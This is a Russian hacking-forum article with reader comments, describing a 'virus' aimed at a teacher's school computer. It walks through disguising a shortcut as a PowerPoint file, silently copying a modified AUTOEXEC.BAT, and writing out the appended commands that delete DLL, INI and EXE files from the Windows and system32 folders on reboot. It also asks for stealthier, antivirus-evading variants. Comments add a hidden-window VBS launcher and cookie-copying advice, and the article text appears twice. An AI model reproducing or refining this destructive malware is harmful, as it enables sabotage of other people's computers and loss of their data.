Вирус в bat файле для класухи ;) — HackZona.Ru
Вирус в bat файле для класухи ;)
Вирус в bat файле для класухи ;)
Тип статьи:
Со старой ХакЗоны.
Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: «а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?». Я нашел ответ. Он находится в bat файлах.
План был таков:
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации. Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах «Свойства папки>Вид» стоит галочка на «Скрывать расширения для зарегистрированных типов файлов». На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.
Файл runner_copier.bat совершает следующие действия:
-открывает файл pres.ppt с самой презентацией, которую йа должен показать
-копирует заранее написанный файл AUTOEXEC.BAT в C:.
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
Но я его немного подправил. Я всего лишь добавил в конец следующие строки:
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
и все!
Действие самого вируса происходит следующим образом:
1)запускаеца файл Презентация.ppt.lnk
2)он ссылаеца на файл runner_copier.bat
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.
5) комп выключается
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.
end.
Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:
-малый размер
-незаметность
-неизвестность антивирям
-большие масштабы действия
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).
В остальном полная свобода.
Удачи в написании вирусов, товарищи!
План был таков:
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации. Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах «Свойства папки>Вид» стоит галочка на «Скрывать расширения для зарегистрированных типов файлов». На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.
Файл runner_copier.bat совершает следующие действия:
-открывает файл pres.ppt с самой презентацией, которую йа должен показать
-копирует заранее написанный файл AUTOEXEC.BAT в C:.
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
Но я его немного подправил. Я всего лишь добавил в конец следующие строки:
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
и все!
Действие самого вируса происходит следующим образом:
1)запускаеца файл Презентация.ppt.lnk
2)он ссылаеца на файл runner_copier.bat
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.
5) комп выключается
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.
end.
Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:
-малый размер
-незаметность
-неизвестность антивирям
-большие масштабы действия
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).
В остальном полная свобода.
Удачи в написании вирусов, товарищи!
15 комментариев
Особенно, вкупе со статьей
/hz.php?name=News&file=article&sid=9334&mode=&order=0&thold=0
жертва быстринько его закрывает и всё вир не сработал но я нашёл способ чтоб окно не открывалось нужно вписать скрипт в самораспоковуйщийся архив
и имно его архив и должен открыть а скрипт этот мы будем писать на vbs его можно создать в блокноке а прописывать мы там будем
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run"C:sistem32Connect.bat ", 0, true"
\
с помощью батников можно сделать ВСЕ ЧТО УГОДНО, ибо батники - свобеобразные программы, которые антивири НЕ сканируют. Куки можно копирнуть командой:
cp <путь к кукисам> [путь, куда скопирнуть кукисы]
все это пишется без <> и [].
КСТАТЕ!
Путь следует писать не с обычными слэшами, а с обратными слэшами, т.к. так принято в досе. со всеми вопросами в ICQ 996407